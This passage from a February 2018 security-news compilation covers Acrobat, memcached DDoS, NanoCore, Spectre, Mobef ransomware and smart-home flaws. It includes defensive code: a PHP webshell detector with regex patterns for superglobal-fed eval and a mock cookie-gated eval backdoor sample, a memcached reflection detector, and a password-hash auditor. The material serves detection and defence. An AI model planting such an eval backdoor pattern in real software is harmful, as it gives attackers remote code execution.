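SUPERGLOBAL = re.compile(r"\$_(?:POST|COOKIE)\b")
TRAILING_EVAL = re.compile(r"eval\s*\([^;]*\)\s*;?\s*(?:\?>)?\s*$")
GUID = re.compile(r"\b[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\b")


@dataclass
class Verdict:
    path: str
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The remote-code path (attacker input + eval) is required; the fake
        # header and the GUID only strengthen the verdict.
        return "superglobal" in self.indicators and "eval" in self.indicators


def analyze_php(src: str, path: str = "<memory>") -> Verdict:
    """Collect the indicators present in one PHP source text."""
    v = Verdict(path)
    if IONCUBE_HEADER.match(src):
        v.indicators.append("ioncube_header")
    if SUPERGLOBAL.search(src):
        v.indicators.append("superglobal")
    if TRAILING_EVAL.search(src):
        v.indicators.append("eval")
    if GUID.search(src):
        v.indicators.append("guid")
    return v


def scan_tree(root: str):
    """Walk a web root and return verdicts for every suspicious .php file."""
    hits = []
    for p in Path(root).rglob("*.php"):
        try:
            v = analyze_php(p.read_text(errors="replace"), str(p))
        except OSError:
            continue
        if v.suspicious:
            hits.append(v)
    return hits


# Constructed samples. FAKE_SAMPLE mimics the structure SiteLock described;
# its decoder is a placeholder name and the snippet is not functional code.
FAKE_SAMPLE = (
    "<?php //004fb\n"
    "$k = 'd41d8cd9-8f00-3204-a980-0998ecf8427e';\n"
    "if (($_COOKIE['t'] ?? '') !== $k) { exit; }\n"
    "$decoded = placeholder_decoder($_POST['c']);\n"
    "eval($decoded);\n"
)
# A normal form handler: reads $_POST but never evals, so it is not flagged.
FORM_SAMPLE = "<?php\n$name = $_POST['name'];\necho htmlspecialchars($name);\n"
STATIC_SAMPLE = "<?php\necho 'menu';\n"

if __name__ == "__main__":
    for name, src in (("fake", FAKE_SAMPLE), ("form", FORM_SAMPLE), ("static", STATIC_SAMPLE)):
        v = analyze_php(src, name)
        print(f"{name:7} suspicious={v.suspicious} indicators={v.indicators}")
    if len(sys.argv) > 1:
        for hit in scan_tree(sys.argv[1]):
            print(hit.path, hit.indicators)
```

Run it with a web root as the first argument to list candidate files; review each hit by hand, since legitimate code that evals user input (rare, but it exists) will also trip the core rule.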

Talos experts shared details of a remote code execution flaw in Adobe Acrobat Reader DC
28.2.2018 securityweek

Security experts at Cisco Talos disclosed details of a remote code execution flaw that affects Adobe Acrobat Reader DC versions 2018.009.20050 and 2017.011.30070 and earlier.
Security experts at Cisco Talos shared details of a remote code execution vulnerability tracked as CVE-2018-4901, that affects Adobe Acrobat Reader DC.

A remote attacker can exploit the vulnerability by tricking the victim into opening a malicious file or visiting a specially crafted webpage.

The flaw affects Adobe Acrobat Reader versions 2018.009.20050 and 2017.011.30070 and earlier. The vulnerability was disclosed on Dec. 7 and Adobe addressed it a few days ago, on February 13.

“Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.” reads the analysis published by the Talos team.

Adobe classified the flaw as “priority 2”, which corresponds to “important” and means there is an “elevated risk” of exploitation. The good news is that there are currently no known exploits in the wild.

The researchers explained that an attacker could embed malicious JavaScript code in a PDF file that abuses the document ID field to trigger a stack-based buffer overflow when the specially crafted document is opened.

“A specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader,” continues Talos.

Researchers at Talos also released Snort rules 45102-3 that could be used by administrators to detect exploitation attempts.

Experts warn Memcached DDoS attacks could be soon a dangerous threat
28.2.2018 securityweek

Security experts have started observing a dangerous new DDoS amplification technique: memcached DDoS attacks.
Researchers at several security firms have reported that threat actors have started abusing the memcached protocol to power distributed denial-of-service (DDoS) attacks, so-called memcached DDoS attacks.

Memcached is a free and open source, high-performance, distributed memory caching system designed to speed up dynamic web applications by alleviating database load.

Clients communicate with memcached servers via TCP or UDP on port 11211.

Researchers from Cloudflare, Arbor Networks and security firm Qihoo 360 recently discovered that attackers are abusing memcached for DDoS amplification attacks.

Chinese experts had already warned about memcached abuse for DDoS attacks in November.

Experts at Cloudflare dubbed this type of attack Memcrashed.

“Over last couple of days we’ve seen a big increase in an obscure amplification attack vector – using the memcached protocol, coming from UDP port 11211.” reads the analysis published by Cloudflare.

“An IP-spoofing capable attacker sends forged requests to a vulnerable UDP server. The UDP server, not knowing the request is forged, politely prepares the response. The problem happens when thousands of responses are delivered to an unsuspecting target host, overwhelming its resources – most typically the network itself.”

Abusing memcached servers for DDoS attacks is quite simple: the attacker sends a request to the targeted server on port 11211, spoofing the victim’s IP address as the source. In a memcached DDoS attack, the request sent to the server is only a few bytes, while the response can be tens of thousands of times bigger, resulting in an amplification attack.


The researchers at Cloudflare observed a memcached DDoS attack that peaked at 260 Gbps while Arbor Networks reported observing attacks that peaked at 500 Gbps and even more.

“We have observed a considerable uptick in memcached reflection/amplification attacks ranging in size from a few hundred mb/sec up to 500gb/sec and larger. The amplified attack traffic is sourced from UDP/11211, with a packet size of 1428 bytes (1442 bytes with layer-2 Ethernet framing included), and no fragmentation (memcached segments large responses at layer-7, as does ntp).” reads the analysis published by Arbor Networks. “The attacker typically ‘primes’ a given set of memcached reflectors/amplifiers with arbitrary-length key/value pairs, and then issues memcached queries for those key/value pairs, spoofing the IP addresses of targeted hosts/networks.”

Researchers at Arbor Networks added that attackers can also send queries at TCP port 11211, but since TCP queries cannot be reliably spoofed, the hackers opted for UDP.

“I was surprised to learn that memcached does UDP, but there you go! The protocol specification shows that it’s one of the best protocols to use for amplification ever! There are absolutely zero checks, and the data WILL be delivered to the client, with blazing speed! Furthermore, the request can be tiny and the response huge (up to 1MB).” continues the analysis published by Cloudflare.

“Launching such an attack is easy. First the attacker implants a large payload on an exposed memcached server. Then, the attacker spoofs the “get” request message with target Source IP.”

According to Cloudflare, most of the memcached DDoS attacks were launched from servers in North America and Europe, the majority of them hosted by OVH, DigitalOcean, and Sakura.


The experts observed attacks from roughly 5,700 unique IPs associated with memcached servers.

The situation can rapidly get worse: a simple Shodan query shows nearly 88,000 unsecured memcached servers, most of them in the United States, China and France.

Cloudflare recommends disabling UDP support unless it’s needed and isolating memcached servers from the Internet. Internet service providers have to fix vulnerable protocols and prevent IP spoofing.

“Internet Service Providers – In order to defeat such attacks in future, we need to fix vulnerable protocols and also IP spoofing. As long as IP spoofing is permissible on the internet, we’ll be in trouble.” concluded Cloudflare.

“Developers – Please please please: Stop using UDP. If you must, please don’t enable it by default. If you do not know what an amplification attack is I hereby forbid you from ever typing
into your editor.”

Memcached Servers Abused for Massive Amplification DDoS Attacks
28.2.2018 thehackernews

Cybercriminals have figured out a way to abuse widely used Memcached servers to launch DDoS attacks more than 51,000 times more powerful than the original traffic, which could knock down major websites and Internet infrastructure.
In recent days, security researchers at Cloudflare, Arbor Networks, and Chinese security firm Qihoo 360 noticed that hackers are now abusing "Memcached" to amplify their DDoS attacks by an unprecedented factor of 51,200.
Memcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory and has been designed to work with a large number of open connections. Memcached server runs over TCP or UDP port 11211.
The Memcached application has been designed to speed up dynamic web applications by reducing stress on the database that helps administrators to increase performance and scale web applications. It's widely used by thousands of websites, including Facebook, Flickr, Twitter, Reddit, YouTube, and Github.
Dubbed Memcrashed by Cloudflare, the attack apparently abuses unprotected Memcached servers that have UDP enabled in order to deliver DDoS attacks 51,200 times their original strength, making it the most prominent amplification method ever used in the wild so far.
How Memcrashed DDoS Amplification Attack Works?

Like other amplification methods where hackers send a small request from a spoofed IP address to get a much larger response in return, Memcrashed amplification attack also works by sending a forged request to the targeted server (vulnerable UDP server) on port 11211 using a spoofed IP address that matches the victim's IP.
According to the researchers, a request of just a few bytes sent to a vulnerable server can trigger a response tens of thousands of times bigger.
"15 bytes of request triggered 134KB of response. This is amplification factor of 10,000x! In practice we've seen a 15-byte request result in a 750kB response (that's a 51,200x amplification)," Cloudflare says.
According to the researchers, most of the Memcached servers being abused for amplification DDoS attacks are hosted at OVH, Digital Ocean, Sakura and other small hosting providers.
In total, researchers have seen only 5,729 unique source IP addresses associated with vulnerable Memcached servers, but they are "expecting to see much larger attacks in future, as Shodan reports 88,000 open Memcached servers." Cloudflare says.
"At peak we've seen 260Gbps of inbound UDP memcached traffic. This is massive for a new amplification vector. But the numbers don't lie. It's possible because all the reflected packets are very large," Cloudflare says.
Arbor Networks noted that the Memcached priming queries used in these attacks could also be directed towards TCP port 11211 on abusable Memcached servers.

But TCP is not currently considered a high-risk Memcached reflection/amplification vector because TCP queries cannot be reliably spoofed.
The popularly known DDoS amplification attack vectors that we reported in the past include poorly secured domain name system (DNS) resolution servers, which amplify volumes by about 50 times, and network time protocol (NTP), which increases traffic volumes by nearly 58 times.
Mitigation: How to Fix Memcached Servers?
One of the easiest ways to prevent your Memcached servers from being abused as reflectors is firewalling, blocking or rate-limiting UDP on source port 11211.
Since Memcached listens on INADDR_ANY and runs with UDP support enabled by default, administrators are advised to disable UDP support if they are not using it.
The attack size potentially created by Memcached reflection cannot be easily defended against by Internet Service Providers (ISPs), as long as IP spoofing is permissible on the internet.
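The two measures both memcached articles above recommend, disabling UDP and keeping the daemon off public interfaces, and the traffic signature Arbor describes (sustained runs of 1428-byte UDP packets sourced from port 11211) can both be checked in code. The following is an added example, not code from Cloudflare, Arbor or the memcached project: it audits a memcached command line for the -U (UDP port, 0 disables) and -l (bind address) options, which are real memcached flags, and aggregates flow records to find destinations receiving amplified traffic. The flow record layout, the 1000-packet threshold, the length slack and the sample addresses are constructed assumptions.

```python
"""Memcached reflection: server-side option audit and flow-based detection.
Added example; the flow record layout, thresholds and addresses are assumptions."""
from collections import defaultdict
from dataclasses import dataclass

MEMCACHED_PORT = 11211
# Arbor observed amplified responses as 1428-byte UDP payloads sourced from
# UDP/11211; sustained runs of such packets toward one destination are the signature.
REFLECTED_PAYLOAD_LEN = 1428
LEN_SLACK = 100            # assumption: tolerate slightly shorter trailing segments


def audit_memcached_args(argv):
    """Return findings for a memcached command line.

    -U <port> sets the UDP port (0 disables UDP); -l <addr> sets the bind
    address. Releases before 1.5.6 enabled UDP and bound to INADDR_ANY by
    default, which is exactly the exposed configuration abused in these attacks.
    The matching edge control is a filter such as
    'iptables -A INPUT -p udp --dport 11211 -j DROP' on Internet-facing hosts.
    """
    findings = []
    udp_port = MEMCACHED_PORT   # default when -U is absent on old builds
    listen = "0.0.0.0"          # INADDR_ANY when -l is absent
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-U", "-l") and i + 1 < len(argv):
            flag, val, i = arg, argv[i + 1], i + 2
        elif arg[:2] in ("-U", "-l") and len(arg) > 2:   # attached form, e.g. -U0
            flag, val, i = arg[:2], arg[2:], i + 1
        else:
            i += 1
            continue
        if flag == "-U":
            udp_port = int(val)
        else:
            listen = val
    if udp_port != 0:
        findings.append(f"UDP enabled on port {udp_port}: start with -U 0 unless UDP is needed")
    if listen in ("0.0.0.0", "::"):
        findings.append("listening on all interfaces: bind to an internal address with -l")
    return findings


@dataclass(frozen=True)
class Flow:
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    payload_len: int   # bytes per packet
    packets: int


def find_reflection_victims(flows, min_packets=1000):
    """Aggregate UDP flows sourced from 11211 per destination IP and return the
    destinations that receive enough large packets to look like amplified traffic."""
    per_dst = defaultdict(lambda: {"packets": 0, "bytes": 0, "reflectors": set()})
    for f in flows:
        if f.proto != "UDP" or f.src_port != MEMCACHED_PORT:
            continue                       # TCP cannot be reliably spoofed; skip
        if f.payload_len < REFLECTED_PAYLOAD_LEN - LEN_SLACK:
            continue                       # small replies: ordinary cache traffic
        agg = per_dst[f.dst_ip]
        agg["packets"] += f.packets
        agg["bytes"] += f.packets * f.payload_len
        agg["reflectors"].add(f.src_ip)
    return {dst: a for dst, a in per_dst.items() if a["packets"] >= min_packets}


def amplification_factor(request_bytes, response_bytes):
    """Bandwidth amplification factor, e.g. Cloudflare's 15-byte request vs 750 kB reply."""
    return response_bytes / request_bytes


# Constructed flow records: two reflectors hammering one target, one benign
# client/server exchange on an internal network, and one TCP flow from 11211.
SAMPLE_FLOWS = [
    Flow("UDP", "203.0.113.10", 11211, "198.51.100.5", 443, 1428, 40_000),
    Flow("UDP", "203.0.113.11", 11211, "198.51.100.5", 80, 1428, 25_000),
    Flow("UDP", "10.0.0.5", 11211, "10.0.0.7", 41000, 120, 30),
    Flow("TCP", "203.0.113.12", 11211, "198.51.100.9", 53211, 1428, 5_000),
]

if __name__ == "__main__":
    print(audit_memcached_args(["memcached", "-m", "64", "-p", "11211"]))
    for dst, agg in find_reflection_victims(SAMPLE_FLOWS).items():
        print(dst, agg["packets"], "packets,", agg["bytes"], "bytes from", sorted(agg["reflectors"]))
    print(f"{amplification_factor(15, 750 * 1024):.0f}x")
```

The flow classifier keys on the source port and packet size rather than on content because the reflected traffic reaches the victim's network as ordinary-looking UDP; feeding it exported flow records from the edge is enough to see which address is being targeted and which reflectors to report to their hosting providers.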

Hacker Who Never Hacked Anyone Gets 33-Month Prison Sentence
28.2.2018 thehackernews Crime

A hacker who was arrested and pleaded guilty last year—not because he hacked someone, but for creating and selling a remote access trojan that helped cyber criminals—has finally been sentenced to serve almost three years in prison.
Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty in July 2017 to one charge of aiding and abetting computer intrusions by building and intentionally selling a remote access trojan (RAT), called NanoCore, to hackers for $25.
Huddleston was arrested in March, almost two months before the FBI raided his house in Hot Springs, Arkansas and left with his computers after 90 minutes, only to return eight weeks later with handcuffs.
This case is a rare example of the US Department of Justice (DOJ) charging someone not for actively using malware to hack victims' computers, but for developing and selling it to other cybercriminals.
Huddleston admitted to the court that he created his software knowing it would be used by other cybercriminals to break the law.
He initially started developing NanoCore in late 2012 with a motive to offer a low-budget remote management software for schools, IT-conscious businesses, and parents who desired to monitor their children's activities on the web.

However, Huddleston marketed and sold the NanoCore RAT for $25 in underground hacking forums that were extremely popular with cybercriminals around the world from January 2014 to February 2016. He then sold ownership of NanoCore to a third-party in 2016.
NanoCore RAT happens to be popular among cybercriminals on underground hacking forums and has been linked to intrusions in at least ten countries. Among the victims was a high-profile assault on Middle Eastern energy firms in 2015.
Huddleston also agreed with prosecutors that NanoCore RAT and available third-party plugins offered a full set of features including:
Stealing sensitive information from victim computers, such as passwords, emails, and instant messages.
Remotely activating and controlling connected webcams on the victims' computers in order to spy on them.
Ability to view, delete, and download files.
Locking infected PCs and holding them to ransom.
Using infected PCs to launch distributed denial of service (DDoS) attacks on websites and similar services.
In his July plea, Huddleston also took responsibility for creating and operating a software licensing system called "Net Seal" that was used by another suspect, Zachary Shames, to sell thousands of copies of the Limitless keylogger.
Shames used Net Seal to infect 3,000 people who, in turn, used it to infect 16,000 computers, according to the DoJ.
In his guilty plea, Huddleston admitted that he intended his products to be used maliciously.
Besides the 33-month prison sentence handed down by judges on Friday, Huddleston also gets two years of supervised release.

Intel Releases Spectre Patches for Broadwell, Haswell CPUs
28.2.2018 securityweek 

Intel has released new firmware updates for its Broadwell and Haswell processors to address the Spectre vulnerability.

After the first round of Spectre patches released by the company caused more frequent reboots and other instability problems, Intel started working on new microcode updates.

The company first released new firmware updates for its Skylake processors, and last week it announced the availability of patches for several other CPUs, including Kaby Lake and Coffee Lake.

This week, the company updated the list of available firmware patches to state that the fixes for Haswell and Broadwell processors are also ready for use in production environments.

As of February 28, patches that can be deployed in production environments are available for the following products: Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broadwell (except Server EX), Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Haswell (except Server EX), Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Beta patches have been provided to OEMs for validation for Gladden, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The microcode updates for Broadwell and Haswell Server EX processors, specifically the Xeon E7v4 and E7v3 product families, are also in beta phase.

As for the remaining CPUs, updates are either in pre-beta or planning phase, but pre-mitigation microcode updates are available for many of these products.

The patches will be delivered as OEM firmware updates. Device manufacturers started releasing BIOS updates to patch the Meltdown and Spectre vulnerabilities shortly after their disclosure, but a majority of firms decided to halt the updates due to instability issues. Some vendors have now resumed the distribution of firmware updates.

Meltdown attacks are possible due to a vulnerability tracked as CVE-2017-5754, while Spectre attacks are possible due to flaws tracked as CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be patched with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel and AMD claim they are working on processors that will have built-in protections against these types of exploits.

Intel faces more than 30 lawsuits, including ones filed by customers and shareholders, over the Meltdown and Spectre vulnerabilities.

CSE Malware ZLab – Malware Analysis Report: A new variant of Mobef Ransomware
28.2.2018 securityaffairs

Malware researchers at CSE Cybsec – ZLab have analyzed a new variant of Mobef ransomware, a malware that in the past mainly targeted Italian users.
Malware researchers at CSE Cybsec – ZLab have analyzed a new variant of Mobef ransomware, that was involved in past attacks against Italian users.

I personally obtained the sample from researchers at @MalwareHunterTeam and the Italian expert @Antelox and passed it to the experts at ZLab.

MalwareHunterTeam, 7:45 PM - Feb 24, 2018:

Thanks to @Antelox, we now have a sample for the ransomware that is targeting Italy (https://twitter.com/malwrhunterteam/status/967132494104530947 …): https://www.virustotal.com/en/file/aa2c9c02def2815aa24f5616051aa37e4ce002e62f507b3ce15aac191a36e162/analysis/1518986221/ …
Interesting packing/protection, maybe it's worth digging into @hasherezade @VK_Intel @BleepinComputer @demonslay335
cc @JAMESWT_MHT @forensico

Seems it's a new version of Mobef (or maybe not even a new version, just a new note). Note that most of the Mobef victims we have seen in the past year were also from Italy.
For this one, we have only seen victims from Italy so far. The first was on the 16th of this month.
The above sample was also seen from Italy...
Like classic ransomware, it encrypts all user files without changing the file extension and drops a file containing instructions on how to pay the ransom.

Mobef ransomware note

The analysis revealed that the ransomware was written in Delphi 4 and doesn’t include useful strings. The Import Address Table is empty, which means the malware isn’t as trivial as it seems: it uses techniques to hinder analysis.

After the execution, the ransomware creates three files:

4YOU: it contains the ransom note as shown in the popup window; it is stored in each folder in which there are encrypted files.
KEI: it contains the personal key used to identify the victim; it is stored in each folder in which there are encrypted files.
log: it contains the list of the encrypted files and is stored in “C:\Windows”. This file also serves as the malware’s kill-switch, and its filename is the same for every infection.
Mobef ransomware – List of encrypted files

Once the encryption phase is complete, the new variant of the Mobef ransomware tries to contact an external server, “mutaween.sa”, to exfiltrate information.

It is interesting to note that the domain “mutaween.sa” doesn’t exist, it isn’t currently resolved by the DNS servers.

A deep analysis of the Mobef ransomware revealed that it implements a number of functionalities, such as the capability to encrypt files, not only on the local drive but also on removable drives and network shares.

Further details on the Mobef ransomware and Yara rules are included in the report published by researchers at ZLab.

IoT hack: how to break a smart home… again
28.2.2018 Kaspersky  IoT
There can never be too many IoT gadgets – that’s what people usually think when buying yet another connected device with advanced functionality. From our perspective, we also think there can’t be too many IoT investigations. So, we have continued our experiments into checking and uncovering how vulnerable they are, and followed up our research focusing on smart home devices.

Researchers have already been analyzing connected devices for many years, but concerns around cybersecurity in the IoT world are still there, putting users under significant risk. In our previous analysis, possible attack vectors affecting both a device and a network to which it’s connected have been discovered. This time, we’ve chosen a smart hub designed to control sensors and devices installed at home. It can be used for different purposes, such as energy and water management, monitoring and even security systems.

This tiny box receives information from all the devices connected to it, and if something happens or goes wrong, it immediately notifies its user via phone, SMS or email in accordance with its preferences. An interesting thing is that it is also possible to connect the hub to local emergency services, so that alerts will be sent to them accordingly. So, what if someone was able to interfere with this smart home system and gain control over the home controllers? It could turn life into a nightmare not only for its user, but also for the emergency services. We decided to test this hypothesis and, as a result, discovered logical vulnerabilities that give cybercriminals several attack vectors.

Physical access
First, we decided to check what an attacker outside the network could exploit. We discovered that the hub’s firmware is publicly available and can be downloaded from the vendor’s servers without any subscription. Therefore, once it is downloaded, anyone can easily inspect the files inside it and analyze them.

We found that the password of the root account in the shadow file is encrypted with the Data Encryption Standard (DES) algorithm. As practice shows, this cryptographic algorithm is not considered secure or highly resistant to cracking, so an attacker can brute-force the hash and recover the ‘root’ password.
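An audit of the kind that would catch this during firmware review, as an added example that is not Kaspersky's code: it parses shadow-style lines and classifies each password field by hash format, flagging the 13-character traditional DES crypt form described above (and md5crypt) as weak, and locked or empty fields separately. The sample entries and their hash values are constructed.

```python
"""Audit password hashes in a shadow-style file for weak algorithms.
Added example; the sample entries are constructed."""
import re
from dataclasses import dataclass

# Traditional DES crypt(3) output: 13 characters from the crypt alphabet
# (2-character salt + 11-character hash) with no "$id$" prefix. The key is
# 56 bits and the password is truncated to 8 characters, so it falls to
# brute force on commodity hardware, as the hub analysis above shows.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")

# Modular-crypt prefixes and whether the scheme is acceptable today.
PREFIXES = {
    "$1$": ("md5crypt", "weak"),      # fast MD5-based scheme; no longer recommended
    "$2a$": ("bcrypt", "ok"),
    "$2b$": ("bcrypt", "ok"),
    "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$7$": ("scrypt", "ok"),
    "$y$": ("yescrypt", "ok"),
}


@dataclass
class Entry:
    user: str
    algorithm: str
    strength: str   # "weak", "ok", "locked" or "none"


def classify_hash(field):
    """Map one shadow password field to (algorithm, strength)."""
    if field == "":
        return ("none", "none")            # empty field: no password at all
    if field.startswith(("!", "*")):
        return ("locked", "locked")        # account cannot log in with a password
    for prefix, result in PREFIXES.items():
        if field.startswith(prefix):
            return result
    if DES_CRYPT.match(field):
        return ("descrypt", "weak")
    return ("unknown", "weak")             # unrecognised: treat as needing review


def audit_shadow(text):
    """Parse shadow-format text (user:hash:...) into Entry records."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        algorithm, strength = classify_hash(fields[1])
        entries.append(Entry(fields[0], algorithm, strength))
    return entries


def weak_accounts(text):
    """Users whose stored hash an attacker holding the file could feasibly crack."""
    return [e.user for e in audit_shadow(text) if e.strength == "weak"]


# Constructed shadow file: a DES-crypt root entry like the one found in the
# hub firmware, a modern sha512crypt entry, two locked system accounts, and an
# md5crypt service account. None of these are real hashes.
SAMPLE_SHADOW = """\
root:abJnggxhB/yWI:17500:0:99999:7:::
admin:$6$c0nstructed$notarealhashvalue0000000000000000000000000000000000000:17500:0:99999:7:::
daemon:*:17500:0:99999:7:::
nobody:!!:17500:0:99999:7:::
svc:$1$c0nstruc$notarealhashvalue00000:17500:0:99999:7:::
"""

if __name__ == "__main__":
    for e in audit_shadow(SAMPLE_SHADOW):
        print(f"{e.user:8} {e.algorithm:12} {e.strength}")
    print("weak:", weak_accounts(SAMPLE_SHADOW))
```

Pointing audit_shadow at the etc/shadow file extracted from a firmware image gives the same answer the researchers reached by hand; the remediation on the device side is to move the account to sha512crypt or yescrypt and, better, to avoid shipping a shared root password in the image at all.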

To access the hub with ‘root’ rights and therefore modify files or execute commands, physical access is needed. However, we don’t shy away from hardware hacking of devices, even though not all of them survive it.

We explored the device physically, but of course not everyone would be able to do this. However, our further analysis showed there are other options to gain remote access over it.

Remote access
For hub control, users can either use a special mobile application or a web-portal through which they can set up a personal configuration and check all the connected systems.

To implement it, the owner sends a command for synchronization with the hub. At that moment, all settings are packed in the config.jar file, which the hub then downloads and implements.

But as we can see, the config.jar file is sent through HTTP and the device’s serial number is used as the device identifier. So, hackers can send the same request with an arbitrary serial number, and download an archive.

Some might think that serial numbers are very unique, but developers prove otherwise: serial numbers are not very well protected and can be brute-forced with a byte selection approach. To check the serial number, remote attackers can send a specially crafted request, and depending on the server’s reply, will receive information if the device is already registered in the system.

Moreover, our initial research has shown that users, without even realizing it, put themselves at risk by publishing their tech reviews online or posting photos of a hub in social networks and openly presenting devices’ serial numbers. And the security consequences will not be long in coming.

While analyzing the config.jar archive, we found that it contains login and password details – all the data needed to access a user’s account through the web interface. Although the password is stored encrypted in the archive, it can be cracked with publicly available tools and open-source password databases. Importantly, during the initial registration of a user account in the system there are no password complexity requirements (length, special characters, etc.), which makes recovering the password easier.

As a result, we gained access to a user’s smart home with all the settings and sensor information being available for any changes and manipulations. The IP address is also listed there.

It is also possible that there might be other personal sensitive information in the archive, given the fact that users often upload their phone numbers into the system to receive alerts and notifications.

Thus, the few steps involved with generating and sending the right requests to the server can provide remote attackers with the possibility of downloading data to access the user’s web interface account, which doesn’t have any additional security layers, such as 2FA (Two Factor Authentication). As a result, attackers can take control over someone’s home and turn off the lights or water, or, even worse, open the doors. So, one day, someone’s smart life could be turned into a complete nightmare. We reported all the information about the discovered vulnerabilities to the vendor, which are now being fixed.

But there is always light at the end of the tunnel…
In addition to smart “boxes”, we had something smaller in our pocket – a smart light bulb, which has no critical use for either safety or security. However, it also surprised us with a few – but still worrying – security issues.

The smart bulb is connected to a Wi-Fi network and controlled over a mobile application. To set it up a user needs to first download the mobile application (iOS or Android), switch on the bulb, connect to the Wi-Fi access point created by the bulb and provide the bulb with the SSID and password from a local Wi-Fi network.

From the application, users can switch the bulb on and off, set timers and change different aspects of the light, including its intensity and color. Our goal was to find out whether the device could help an attacker in any way to gain access to the local network, from which it would eventually be possible to conduct an attack.

After several attempts, we were lucky to find a way to reach the device’s firmware through the mobile application. Interestingly, the bulb does not interact with the mobile application directly: both the bulb and the application connect to a cloud service, and all communication goes through it. This explains why sniffing the local network traffic revealed almost no interaction between the two.

We discovered that the bulb requests a firmware update from the server and downloads it over plain HTTP, which does not secure the communication with the server. An attacker on the same network could therefore mount a man-in-the-middle attack with little effort.

Hardware reconnaissance with flash dumping led us not only to the firmware but to user data as well. A quick look at the information shared with the cloud suggests that no sensitive information is uploaded from the device or the internal network. However, we found the credentials of every Wi-Fi network the bulb had previously connected to, stored unencrypted in the device’s flash indefinitely – even after a “hard” reset of the device this data was still there. Reselling such a device on online marketplaces is therefore not a good idea.

Get ready
Our latest research has once again confirmed that ‘smart home’ doesn’t mean ‘secure home’. Several logical vulnerabilities (combined with an inadvertently published serial number) can literally open the doors of your home and welcome in cybercriminals. Besides this, remote access to and control over your smart hub can lead to a wide range of sabotage activities, which could cost you through high electricity bills, a flood or, even more importantly, your mental health.

But even if your smart hub is secure, never forget that the devil is in the details: a tiny thing such as a light bulb could serve as an entry-point for hackers as well, providing them with access to a local network.

That’s why it’s highly important for users to follow these simple cyber hygiene rules:

Always change the default password and use a strong, complex one instead. Don’t forget to update it regularly.
Don’t share serial numbers, IP addresses and other sensitive information about your smart devices on social networks.
Be aware and always check the latest information on discovered IoT vulnerabilities.
No less important, vendors should improve and enhance their security approach to ensure that their devices, and as a result their users, are adequately protected. In addition to a cybersecurity check, which is just as vital as testing other features before releasing a product, it is necessary to follow IoT cybersecurity standards. Kaspersky Lab has recently contributed to the ITU-T (International Telecommunication Union — Telecommunication sector) Recommendation, created to help maintain the proper protection of IoT systems, including smart cities, wearable and standalone medical devices and many others.

From IDF to Inc: The Israeli Cybersecurity Startup Conveyor Belt
28.7.2018 securityweek BigBrothers

Israeli Defense Force (IDF) Unit 8200

Understanding Why Israel Produces Many Cybersecurity Firms Starts With Understanding the Talent That Israeli Defense Force (IDF) Unit 8200 Produces

One definition of 'entrepreneur' is "a person who organizes and manages any enterprise, especially a business, usually with considerable initiative and risk." If Israel were a business, then its founders were entrepreneurs; and there is little wonder that the nation is imbued with an entrepreneurial spirit.

This spirit shapes Israeli business. Peter Rousseau, now with The Hackett Group, wrote last year, "Seventy-six Israeli companies are currently traded on the NASDAQ, behind only the United States and China. Israel exports $1,246 worth of hi-tech goods and services per capita compared to $488 for the U.S. and $295 for the rest of the world."

Nowhere is the entrepreneurial spirit better demonstrated than in the quantity and quality of contemporary cybersecurity firms that have come from Israel -- starting, perhaps, with Check Point. Check Point was founded in 1993 by Gil Shwed, Shlomo Kramer, and Marius Nacht. Shwed and Kramer had served together in the Israeli Defense Force (IDF) Unit 8200. One of Check Point's earliest employees was Nir Zuk, who moved on to become the founder and CTO of Palo Alto Networks. Zuk also served in IDF Unit 8200 -- and Unit 8200 is a pervasive thread that dominates Israeli cybersecurity firms.

Unit 8200 is the signals intelligence (SIGINT) and web intelligence (WEBINT) unit of the Israeli military; and is generally considered among the elite of the world's intelligence agencies. It is not the only technology unit in the IDF; but it is the offensive or proactive unit. All young Israelis do between 32 and 36 months military service from the age of 18. Those with a particular aptitude for SIGINT are literally 'creamed off' into Unit 8200.

Development of Israel's SIGINT

Unit 8200 did not spring from nothing with the formation of Israel in 1948. Jewish intelligence groups had been working in Palestine both with the ruling British administration, and against the British and Arabs -- sometimes simultaneously -- for many years. After 1948, the Israeli military became the IDF and established a military intelligence group codenamed 'Rabbit'. Rabbit was charged with intercepting and decoding Arab communications; a charge born of necessity.

Unit 8200 evolved out of Rabbit. Initially with little budget and low manpower, it was forced to develop its own technology and techniques -- the entrepreneurial spirit of the nation co-existed within its intelligence agency from its very origins.

The modern Unit 8200, however, grew out of the Yom Kippur War in 1973. On that Atonement Day, Israel was simultaneously invaded by Egypt and Syria. Although Israel eventually defeated the invaders, it was at heavy cost in both lives and finance. Subsequent analysis showed that a failure in intelligence had left the nation unprepared -- and the subsequent reorganization of Unit 8200 was designed to prevent this from ever happening again. Part of this was the conscious encouragement of 'chutzpah' (audacity) among its staff.

This is the basis of today's Unit 8200: the cream of youth, highly trained in signals intelligence, encouraged to be audacious in thought and action, and imbued with an entrepreneurial spirit. These young people are then released back into society following their required national service in their early twenties. This is a situation unique in the world.

Israeli Cybersecurity Startups

